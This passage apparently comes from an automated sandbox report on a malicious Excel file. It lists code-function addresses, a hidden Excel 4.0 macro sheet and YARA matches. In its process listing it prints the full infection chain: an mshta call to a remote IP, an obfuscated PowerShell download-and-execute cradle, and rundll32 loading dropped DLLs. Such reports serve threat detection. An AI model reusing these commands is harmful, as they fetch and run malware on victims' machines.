Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004C0014 12_2_004C0014
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A8411 12_2_004A8411
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A3C16 12_2_004A3C16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004BB227 12_2_004BB227
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004BA03A 12_2_004BA03A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A323F 12_2_004A323F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A303C 12_2_004A303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004C023A 12_2_004C023A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004BBA31 12_2_004BBA31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B9E30 12_2_004B9E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A7037 12_2_004A7037
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004BE835 12_2_004BE835
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B5ACA 12_2_004B5ACA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AD6CC 12_2_004AD6CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AA6C7 12_2_004AA6C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B50C4 12_2_004B50C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004ACAD8 12_2_004ACAD8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004BD2DC 12_2_004BD2DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B96E8 12_2_004B96E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B92EC 12_2_004B92EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A58E2 12_2_004A58E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A42E3 12_2_004A42E3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AA2FB 12_2_004AA2FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AECFD 12_2_004AECFD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004BD0F7 12_2_004BD0F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B0C89 12_2_004B0C89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AE281 12_2_004AE281
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AE49B 12_2_004AE49B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004ADE99 12_2_004ADE99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B14BA 12_2_004B14BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A64B3 12_2_004A64B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B7D4B 12_2_004B7D4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A4948 12_2_004A4948
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AAB4D 12_2_004AAB4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A3746 12_2_004A3746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AC347 12_2_004AC347
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004BBF5B 12_2_004BBF5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A995F 12_2_004A995F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B1950 12_2_004B1950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B0B6B 12_2_004B0B6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A7D69 12_2_004A7D69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A4761 12_2_004A4761
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AAF7E 12_2_004AAF7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B7919 12_2_004B7919
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AFF19 12_2_004AFF19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B3516 12_2_004B3516
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A8B14 12_2_004A8B14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004BAF23 12_2_004BAF23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A6124 12_2_004A6124
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A7F3D 12_2_004A7F3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A6B35 12_2_004A6B35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004C0333 12_2_004C0333
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B8FCF 12_2_004B8FCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A91CF 12_2_004A91CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AD9CF 12_2_004AD9CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A1FD9 12_2_004A1FD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B71D5 12_2_004B71D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004BCFEA 12_2_004BCFEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B7FE3 12_2_004B7FE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B89FA 12_2_004B89FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B61F8 12_2_004B61F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A73F2 12_2_004A73F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A4DF2 12_2_004A4DF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AD3F3 12_2_004AD3F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004BC789 12_2_004BC789
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A8F83 12_2_004A8F83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B3F87 12_2_004B3F87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A9F87 12_2_004A9F87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B3F84 12_2_004B3F84
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AE991 12_2_004AE991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004ADD91 12_2_004ADD91
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004BD795 12_2_004BD795
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004C07AD 12_2_004C07AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004BB7A0 12_2_004BB7A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B6FA6 12_2_004B6FA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A45BB 12_2_004A45BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A75B7 12_2_004A75B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004BFDB5 12_2_004BFDB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00189011 12_2_00189011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00183C3C 12_2_00183C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019044F 12_2_0019044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001920BA 12_2_001920BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018D6D8 12_2_0018D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018F8FD 12_2_0018F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00194116 12_2_00194116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019473C 12_2_0019473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018AB87 12_2_0018AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A13AD 12_2_001A13AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001995FA 12_2_001995FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00187FF2 12_2_00187FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001859F2 12_2_001859F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00184816 12_2_00184816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A0C14 12_2_001A0C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00190001 12_2_00190001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00198606 12_2_00198606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A0E3A 12_2_001A0E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019AC3A 12_2_0019AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00183E3F 12_2_00183E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019C631 12_2_0019C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019AA30 12_2_0019AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019F435 12_2_0019F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00187C37 12_2_00187C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019BE27 12_2_0019BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00184C5D 12_2_00184C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00182051 12_2_00182051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00182251 12_2_00182251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00190E53 12_2_00190E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A0056 12_2_001A0056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00181A56 12_2_00181A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00196C49 12_2_00196C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019907F 12_2_0019907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019AE6D 12_2_0019AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00185E60 12_2_00185E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019A666 12_2_0019A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018EA99 12_2_0018EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018F09B 12_2_0018F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00191889 12_2_00191889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018EE81 12_2_0018EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001870B3 12_2_001870B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019DEDC 12_2_0019DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001966CA 12_2_001966CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018E2CC 12_2_0018E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00195CC4 12_2_00195CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018B2C7 12_2_0018B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018AEFB 12_2_0018AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019DCF7 12_2_0019DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019A2E8 12_2_0019A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00199EEC 12_2_00199EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001864E2 12_2_001864E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00184EE3 12_2_00184EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00198519 12_2_00198519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00190B19 12_2_00190B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00189714 12_2_00189714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00188B3D 12_2_00188B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A0F33 12_2_001A0F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00187735 12_2_00187735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019BB23 12_2_0019BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00186D24 12_2_00186D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019CB5B 12_2_0019CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018A55F 12_2_0018A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00192550 12_2_00192550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00185548 12_2_00185548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019894B 12_2_0019894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018B74D 12_2_0018B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00184346 12_2_00184346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018CF47 12_2_0018CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018BB7E 12_2_0018BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00188969 12_2_00188969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019176B 12_2_0019176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00185361 12_2_00185361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018E991 12_2_0018E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019E395 12_2_0019E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019D389 12_2_0019D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00189B83 12_2_00189B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00194B87 12_2_00194B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001851BB 12_2_001851BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A09B5 12_2_001A09B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001881B7 12_2_001881B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019C3A0 12_2_0019C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00197BA6 12_2_00197BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00182BD9 12_2_00182BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00197DD5 12_2_00197DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00199BCF 12_2_00199BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00189DCF 12_2_00189DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018E5CF 12_2_0018E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00196DF8 12_2_00196DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018DFF3 12_2_0018DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019DBEA 12_2_0019DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00198BE3 12_2_00198BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0045F8FD 14_2_0045F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0045AB87 14_2_0045AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0045E991 14_2_0045E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0046044F 14_2_0046044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00466C49 14_2_00466C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00470056 14_2_00470056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00451A56 14_2_00451A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00452051 14_2_00452051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00452251 14_2_00452251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00460E53 14_2_00460E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00454C5D 14_2_00454C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0046A666 14_2_0046A666
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 314D.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: 2022-28-01_1203.xls Macro extractor: Sheet name: REEEEEEEE
Source: 2022-28-01_1203.xls Macro extractor: Sheet name: REEEEEEEE
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Contains functionality to delete services
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018E249 DeleteService, 12_2_0018E249
Yara signature match
Source: 2022-28-01_1203.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\2022-28-01_1203.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Loacxlk\ Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Document contains embedded VBA macros
Source: 2022-28-01_1203.xls OLE indicator, VBA macros: true
Source: 2022-28-01_1203.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/9@2/48
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: 2022-28-01_1203.xls OLE indicator, Workbook stream: true
Source: 2022-28-01_1203.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: 2022-28-01_1203.xls Virustotal: Detection: 11%
Source: 2022-28-01_1203.xls ReversingLabs: Detection: 11%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................P...............................P.......................`I.........v.....................K........\............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.w.......................k....................................}..v............0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k..... ..............................}..v....P.......0.................\............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.w.......................k....................................}..v............0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k......\.............................}..v.... .......0.................\............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.w....#..................k....................................}..v....8.......0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#..................k....8.\.............................}..v............0.................\............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'................,.k....E...............................}..v....x.......0.................\............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+................,.k....E...............................}..v............0.................\............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............X.%.....:....................... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Loacxlk\dndx.ncb",UulABsIFcNr
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Loacxlk\dndx.ncb",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wjrjy\iojmtizxks.ova",ntwFGKOXv
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wjrjy\iojmtizxks.ova",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Htryahunxvozuf\xwruyhjnwpwdsh.vgm",AsDMHz
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Htryahunxvozuf\xwruyhjnwpwdsh.vgm",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Loacxlk\dndx.ncb",UulABsIFcNr Jump to behavior
